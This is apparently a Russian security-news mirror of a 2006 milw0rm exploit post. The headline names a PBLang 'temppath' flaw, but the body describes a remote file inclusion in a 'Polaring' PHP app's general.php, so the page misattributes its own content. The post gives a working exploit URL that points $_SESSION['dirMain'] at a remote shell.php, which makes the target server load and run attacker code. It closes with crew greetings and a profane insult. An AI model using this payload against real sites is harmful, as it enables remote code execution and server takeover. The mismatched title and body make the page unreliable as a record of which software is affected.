Уведомление о безопасности: PBLang <= v4.66z (temppath) Remote File Inclusion Exploit

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  Minerva <= v238 (phpbb_root_path)
Remote File Inclusion Exploit
  IM Portal <= v1.2.0 (phpbb_root_path)
Remote File Inclusion Exploit
  evoBB <= v0.3 (path) Remote File Inclusion Exploit
  BrudaNews <= v1.1 (o) Remote File Inclusion Exploit

From: MILW0RM <submit_(at)_milw0rm.com>
Date: 26 сентября 2006 г.
Subject: PBLang <= v4.66z (temppath) Remote File Inclusion Exploit

###### ToXiC #########################
#
#Polaring Remote File Include
#
#BuG FounD by Drago84
#
#Application Affect: Polaring Remote File Include
#Source Code:
#http://sourceforge.net/project/showfiles.php?group_id=150989&package_id=1668
37&release_id=444225
#Problem:
#require($_SESSION['dirMain'].'/view/css.php');
#require($_SESSION['dirMain'].'/view/frontpage.php');
#require($_SESSION['dirMain'].'/view/navigation.php');
#require($_SESSION['dirMain'].'/view/gmaps.php');
#require($_SESSION['dirMain'].'/view/errorReport.php');
#Solution : Declare $_SESSION['dirMain']
#Page Vulnerable : general.php
#Dir             : /view/
# Exempe Of ExPloit is:
#http://www.site.com/polaring_dir/view/general.php?_SESSION['dirMain']=ht
tp://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic Il chan italiano + merdoso che esista
# ToXic Security Italian CreW

######
ToXiC
###################

# milw0rm.com [2006-09-25]

test server